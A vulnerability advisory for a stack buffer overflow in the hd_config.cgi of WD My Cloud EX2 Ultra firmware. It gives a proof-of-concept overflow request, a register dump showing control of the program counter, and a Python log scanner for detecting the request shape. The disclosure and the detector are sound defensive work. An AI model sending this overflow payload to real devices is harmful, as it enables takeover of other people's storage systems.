CVE-2019-18931
Information
Target : WD My Cloud EX2 Ultra
Version : 2.31.195
Proof of Concept
$ qemu-arm-static -g 1234 -E "QUERY_STRING=cmd=cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&form=" -E REQUEST_METHOD=GET ~/afl/newpj3/targets/_hd_config.cgi/hd_config.cgi
gdb-peda$ info registers
r0 0x9 0x9
r1 0x0 0x0
r2 0xf655d6b8 0xf655d6b8
r3 0xf655cd50 0xf655cd50
r4 0x61616161 0x61616161
r5 0x61616161 0x61616161
r6 0x61616161 0x61616161
r7 0x61616161 0x61616161
r8 0x0 0x0
r9 0xf67bf0f4 0xf67bf0f4
r10 0xf67fe000 0xf67fe000
r11 0x0 0x0
r12 0x3e 0x3e
sp 0xf6fff1b8 0xf6fff1b8
lr 0x61616161 0x61616161
pc 0x61616160 0x61616160
cpsr 0x20000030 0x20000030
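For detection, the request shape in the proof of concept above (cmd=cgi_FMT_Wipe_DiskMGR with an oversized f_wipe_volume_info) can be searched for in web access logs. The following is an added example, not code from the original advisory or from the vendor. The combined log format, the /cgi-bin/ path prefix, the 64-character limit and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate f_wipe_volume_info values are far shorter than this.
MAX_VOLUME_INFO_LEN = 64
# Assumption: common/combined access log format; only the request line is used.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return a finding dict for an oversized f_wipe_volume_info, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/hd_config.cgi"):
        return None
    # parse_qs percent-decodes values, so the length is the decoded length.
    params = parse_qs(url.query, keep_blank_values=True)
    if "cgi_FMT_Wipe_DiskMGR" not in params.get("cmd", []):
        return None
    longest = max((len(v) for v in params.get("f_wipe_volume_info", [])), default=0)
    if longest <= MAX_VOLUME_INFO_LEN:
        return None
    return {"src": m.group("src"), "method": m.group("method"), "length": longest}

def scan(lines):
    """Return findings for every log line that matches the request shape."""
    return [finding for finding in map(inspect_line, lines) if finding]

# Constructed sample log lines (documentation addresses, placeholder values).
PREFIX = "/cgi-bin/hd_config.cgi?cmd="
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET ' + PREFIX
    + 'cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=1&form= HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2020:10:00:05 +0000] "GET ' + PREFIX
    + 'cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=' + "a" * 600 + '&form= HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET ' + PREFIX
    + 'other_command&f_wipe_volume_info=' + "a" * 600 + ' HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the query string is inspected, so a request that carries the same parameters in a POST body will not appear in an access log and needs a check at a proxy or WAF instead.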
Exploit
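In the register dump above, r4 to r7 and lr hold 0x61616161 ("aaaa" from the f_wipe_volume_info parameter), and pc is 0x61616160, the same value with the low bit cleared. It is therefore possible to control the PC register, and ASLR can be bypassed with a brute-force attack.
I will disclose the exploit code soon!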